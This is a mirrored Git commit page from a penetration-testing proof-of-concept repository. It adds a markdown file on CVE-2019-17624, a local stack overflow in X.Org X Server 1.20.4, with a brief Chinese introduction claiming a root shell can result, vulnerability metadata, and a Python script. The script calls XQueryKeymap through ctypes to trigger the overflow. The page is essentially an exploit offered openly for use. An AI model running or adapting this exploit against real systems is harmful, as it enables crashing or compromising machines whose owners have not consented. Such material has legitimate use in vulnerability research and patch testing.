admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-20 09:50:19 +00:00
Code Issues Packages Projects Releases Wiki Activity

add CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC

Browse Source
This commit is contained in:
mr-xn 2019-10-16 23:18:51 +08:00
parent 903ea6a870
commit 87f5a9700f
1 changed files with 63 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC.md Normal file
View File

@ -0,0 +1,63 @@
## CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC
**0x1 简单介绍**
X Server 是绝大对数[Linux](https://mrxn.net/tag/Linux)发行版和Unix系统的基础图形界面程序是系统标配。而此程序也是以Root权限启动的因而成功溢出它而获得的[shell](https://mrxn.net/tag/shell)也是root权限。
**0x2 漏洞相关信息**
```
# 时间: 2019-10-16
# 作者: Marcelo Vázquez (s4vitar)
# 厂商: https://www.x.org/
# 版本: <= 1.20.4
# 测试平台: Linux
# CVE: CVE-2019-17624
```
**0x3 POC**
```python
#!/usr/bin/python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) *
# ************************************************************************
import sys, time
import ctypes as ct
from ctypes import cast
from ctypes.util import find_library
def access_violation(x11, current_display):
keyboard = (ct.c_char * 1000)()
x11.XQueryKeymap(current_display, keyboard)
if __name__ == '__main__':
print "\n[*] Loading x11...\n"
time.sleep(2)
x11 = ct.cdll.LoadLibrary(find_library("X11"))
current_display = x11.XOpenDisplay(None)
print "[*] Exploiting...\n"
time.sleep(1)
try:
access_violation(x11, current_display)
except:
print "\nError...\n"
sys.exit(1)
```